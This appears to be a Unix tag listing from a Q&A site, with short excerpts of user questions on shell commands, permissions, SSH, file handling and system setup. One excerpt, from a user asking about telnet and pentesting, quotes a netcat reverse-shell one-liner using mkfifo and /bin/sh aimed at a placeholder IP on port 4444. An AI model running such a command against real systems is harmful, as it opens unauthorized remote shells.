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Questions tagged [unix]

Unix is a multitasking, multi-user computer operating system originally developed in 1969 by a group of AT&T employees at Bell Labs.

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confusing `rm` command corner behavior

I am trying to understand the corner case behaviors of rm command. In a folder owned and grouped by root, I have a file owned by user alice. However, user alice does not have any permissions on the ...
milaniez's user avatar
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Accute sign does not work as first character of a line

I have a problem when I type ´+E or ´+A, it should produces É and Á but it is deleted instantaneously. In firefox search bar it works as expect, but in skype or whatsapp it doesnt. My keybord is abnt2....
vfbsilva's user avatar
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Apache OpenOffice 4.1.15 configure: error: only sparc and i386 processors are supported when running configure script

I am trying to compile Apache Open Office 4.1.15 from source because I can't find a precompiled package for Solaris 10. I am running Solaris 10 x86. I am following the readme instructions in main. I ...
alex miranda's user avatar
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How to fix incomplete grep

So I constantly make the mistake of mis-typing my grep commands. I mean to type grep searchstring * However, I often forget to put the * and end up hitting enter after typing grep searchstring. This ...
bk_32's user avatar
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Search among files of a C++ project (located on QNX) containing a given Structure/Class/Object/Void

There is a large project in QNX written in C++, which contains many .h, .cpp, .o files, etc. One of the .cpp files constantly references several functions. One of them is called "MapABC", ...
ayr's user avatar
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Is it possible to transfer files and copy text from VirtualBox with QNX to Windows 10 without Guest Addition?

I have a task like this: I have a virtual machine with QNX. There are old Fortran programs (hydrodynamic problems) there. I need to extract them and process them for Matlab. The problem is that I can'...
ayr's user avatar
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Rstudio Server active and running but cannot access web browser

I had an issue with Rstudio Server and had to kill some sessions and restart. Now when I run rstudio-server status I get the following: local@tb-1:/etc/rstudio$ rstudio-server status ● rstudio-server....
Brandon's user avatar
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Man command broken (MacOS 14.6.1)

Entering "man (anything)" returns "No manual entry for (anything)(anything)", e.g. "man man" return "No manual entry for manman". I've tried new shells, ...
user254657's user avatar
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How do I disable system sleep on macbook

I know how to disable sleep by doing sudo pmset disablesleep 1 And this prevents the system from sleeping when i close the lid. But this also prevents my macbook from asking password when I close my ...
nobody's user avatar
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Added group to user's secondary groups but still unable to edit (resize) file with permissions 664

The output of groups user1: group1 group2 group3 The output of ls -l dir/: total 20 -rw-rw-r-- 1 group2 group2 277 Aug 26 01:52 file ... The output of ls -l outside of dir: drwxrwxr-x ...
aaa's user avatar
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How can I create a command to activate a Python virtual environment across different shells with minimal complexity?

I'm developing a tool that needs to activate a Python virtual environment using a custom command. Currently, I'm using the following alias in my .bashrc file: alias activate_env="source ./env/bin/...
azom's user avatar
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Linux shell coding for adding a column with % (percentage) [closed]

I need help with Linux shell code for adding a column with % percentage calculation. file1: Name Count Tom 10 Tom 7 Tom 5 Tom 4 Result in file2 as shown file2: Name Count Percent Tom 10 38.5 ...
bobo's user avatar
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What format does a Postfix Milter use?

I am attempting to write a custom miller for postfix , but am not sure what format I need to use before I begin writing my logic. So far, I have postfix sending mail to a miller with: ...
user10709800's user avatar
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Change clock settings using terminal

what would be terminal command to change(enable in my case)this setting?
ferrusmanus's user avatar
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Sending Environment Variables via SCP

I'm looking to send some kind of environment variable using "SCP -o" (or any other file transfer protocol for that matter PSFTP, PSCP, etc). I currently use SCP to transfer files between ...
texchar's user avatar
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Unix Sockets as Portrayed via Netstat

I do not have much experience with Unix sockets, but I hope this is the place to start. I want to start with understanding what is going on with a netstat -n command. Is it normal behavior to have ...
joncavaz's user avatar
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Issue when creating a new user and group on macOS

I need to create a user and a group called postgres on my mac but I seem to have issues with that. The reason for needing this user is because I've installed postgresql@15 via brew and it created a ...
Ax M's user avatar
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"find" command does not find all files from root unless folder is specified [duplicate]

I am trying to find the files that are named on this machine, I am logged in as root and am searching from the '/' using the following syntax and receiving the output: # First [root@...
user1917670's user avatar
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Trying to understand telnet behavior and pentesting reverse shell in Unix

The first not working for me and the second working on telnet session, Unix: What is the difference between: .RUN rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip 4444 >/tmp/f And ...
Amir Niko's user avatar
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How do I find files by last day in a month? (or how to copy the latest file per month)

I know there is "find" and I use something like find "/backup.stats/30days" -mtime +30 -type f But I wanted to know if anyone knew of a way to pick out the oldest file by month; ...
RansuDoragon's user avatar
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How to let root use sudoedit as if it was a user?

I'm writing a wrapper for myself around vim that detects when the user's trying to edit a file that doesn't belong to them, and suggests sudoedit or visudo instead. I want to use sudoedit rather than ...
aaaalz's user avatar
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How to detox filenames in a bash script with no errors posted?

OS: Kubuntu 22.04.4 LTS x86_64 detox 1.4.5 To display above: neofetch --stdout |grep 'OS:' detox -V Here is a toxic filename, starts with s1: s1 Ä Ö Ü - ä ö ü Science & < > " 1 \ 2 ⁄ 3 ...
joseph22's user avatar
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Broken pipe, write error: An epidemic of unnecessary output

In the last few months, a problem has been spreading across my systems. That of broken pipe errors: # Solution: # silenced by replacing /bin/bzip2 -> bzip2-reference # to /bin/...
Hincor's user avatar
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How can I use the last changed file as an argument in linux?

I'm thinking of using the last changed file as an argument to commands like ls, echo, or cat, is there a simple and efficient way? this question arose when I was faced with analyzing the latest log ...
Ilgar's user avatar
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Split a large gz compressed file into smaller compressed file gz

My requirement is to load a gz file from gcs to BQ. I am using python and Airflow but it is throwing an error that if a single compressed file size is greater than 5 GB, then we can't load it. I have ...
A gupta's user avatar
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display path to files with same names

with this command in Terminal: ls -R |sort | uniq -d | sort -r I can display a list of files with the same names located in the running directory and subdirectories. But I would like to display also ...
all2alb's user avatar
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Pgbouncer: Multiple Instances on same host receiving same TCP connection when using SO_REUSEPORT

I was able to setup two pgbouncer instances for database connection pooling, on a single VM (CentOS 7.0) listening to same port (6432) on two different TCP socket (I believe) using Linux Kernel ...
goodfella's user avatar
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What is the meaning of the manage-gids parameter in /etc/nfs.conf?

I have run into an issue (on a system which I am not root) where there is a directory using an acl to manage access, I should be allowed access (and I am allowed access if I do a newgrp to one of the ...
lagnut's user avatar
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Is there a trick to add an unix user with '@' inside its login on debian

On Debian, there is not a lot of limitations to add an unix user. Ie: the login may contain dots and uppercase letters. Is there a trick to add an unix user with an '@' inside its login ? I understand ...
benelux's user avatar
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How to run Homebrew service with flags?

I'm running on macOS Sonoma and trying to run this service called AutoRaise. Someone made a Homebrew package for it here. I installed it using Homebrew with my desired flag, brew install autoraise --...
noobie's user avatar
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Shell command to tar directory excluding certain folders

In Bash 4, I want make a tar.gz with excluded folders, and while tons of answers about this simple case exist, nothing works in my case. I would like to keep the directory mentioned in exclude, ...
VOX's user avatar
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What steps are needed to safely create a unix setuid binary that can mount removable drives without privilege escalation

The steps I can think of for a setuid binary that is willing to mount drives on arbitrary paths specified by normal users: the binary must check whether /sys/block/DEV/removable=1 the binary must ...
Zorf's user avatar
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Unable to SSH into localhost on MacOS Big Sur (11.7.3) --> kex_exchange_identification: Connection closed by remote host

I am new to learning about SSH configuration on a Mac. Remote login has been enabled via System Preferences -> Sharing -> Remote Login: On Allow full disk access for remote users: Yes Allow ...
slsu's user avatar
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what does ARG_MAX mean when I run a script?

Up to now I know what ARG_MAX means (thanks to EdMorton): ls foo bar The command is ls and it has three arguments: foo, and bar. It's 7 characters, so the arguments of ls in here is 7. Now let's ...
Saeed's user avatar
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awk string replacement - properly escape '&' character

I am working on one of our applications to update the docker image from using static configs for each environment to a single template using dynamic variable insertion with awk. Our Dockerfile calls a ...'s user avatar
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Is it possible to add/change DNS server without having to drop existing connections?

I just changed (or added another) DNS server to my network connection configuration and would like to use it straight away, but I have a few existing (mostly SSH) connections open that I don't want to ...
FriendFX's user avatar
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tail -f nohup.out gives cannot open 'nohup.out' for reading: No such file or directory

I connected to a remote server using ssh protocol and launched this command in order to run my python script remotely: nohup python3.8 -u > log_15_09_2023.txt & This works fine since if ...
tail's user avatar
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Permission denied on writing into the hard drive

I am trying to download files into an Azure virtual machine. It seems that I have 400 GB hard drive but as a not experienced user, I have saved the files within the /dev/root filesystem, which is ...
Gideon Kogan's user avatar
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Why are simlink loop not an issue?

So I learned that hardlink on folders are forbidden to avoid infinite loops in the file system. Seems a good idea! But why is it not a problem to create an infinite loop with simlinks on folders? Why ...
Xetolone's user avatar
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Connection refused PuTTY to VMWare workstation guest Rocky Linux

I have Windows 10 Pro, in which VMWare Workstation 16 is installed. The guest system I use there is Rocky Linux 8.8. The problem I’m getting Connection refused PuTTY to VMWare workstation guest OS ...
kanchana disanayaka's user avatar
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Can't scp files with long/weird filenames: Invalid argument

When I try to use scp to copy files with long filenames and containing non-alphanumeric characters, I get scp: open local "[some capricious filename]": Invalid argument I can copy them ...
Johannes Bauer's user avatar
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How do I create a shell script that will exit the ssh session after executing the remote commands

I'm trying to write a bash script to compile and deploy some code to a remote server. So far I have been struggling to figure out how to get the script to exit the ssh session. I thought I could just ...
pbuchheit's user avatar
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Unix: zip folder ignoring folder structure and excluding a subdirectory

I want to create a zip ignoring the folder structure, and excluding the content of a specific subfolder. I have tried: zip -rj /path/to/ /path/to/source -x "/path/to/source/subfolder/*&...
Alessandro C's user avatar
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Why UNIX socket files end with and equal sign in ls?

When I list (ls) files in directory, I see the equal sign = after some files. All these files in my case are UNIX domain socket files: user@Debian11:~/src/unix_sock$ l a.out* cli_stream* ...
NK-cell's user avatar
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How to change file access on Unix "-rw-r--r--" to " -r------w- "

(not linux) This is an exercise for my study, changing different file and directory accesses, need to learn how to manipulate with rights I'm trying chmod 400 and it gives -r--r--r--, but I need -r----...
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Unix cat and zip together

What I'm trying to do seems simple enough, but I can't get it to work, nor can I find anything on Google referring to how to do this? I want to first cat a bunch of files, then zip the resulting file ...
bk_32's user avatar
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Find command in IBM AIX

I would verify that files in the location listed may not have both the other-write and any execute permissions set. This requirement to be applied recursively to files contained within subdirectories. ...
medisamm's user avatar
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Does the unix words file change over time or between systems? [closed]

Is the Unix "words" file (e.g at /usr/share/dict/words) pretty standard? I.e, can I generally rely on, for example, the 200th word in the file to be the same word between a fedora and an ...
Him's user avatar
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SSH to AWS EC2 instance hangs

I was able to log in to my ec2 instance via ssh few days ago. But somehow today when I connected it with ssh -i something.pem ubuntu@ip_address -v then the terminal hung on this line: debug1: Local ...
zxcisnoias's user avatar
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Problem while trying to create a new virtual machine

I am trying to install a virtual machine in my computer, I have windows 10. I installed virtual box and I created a new machine, when I try to start the machine, it says : unpacking failed: write ...
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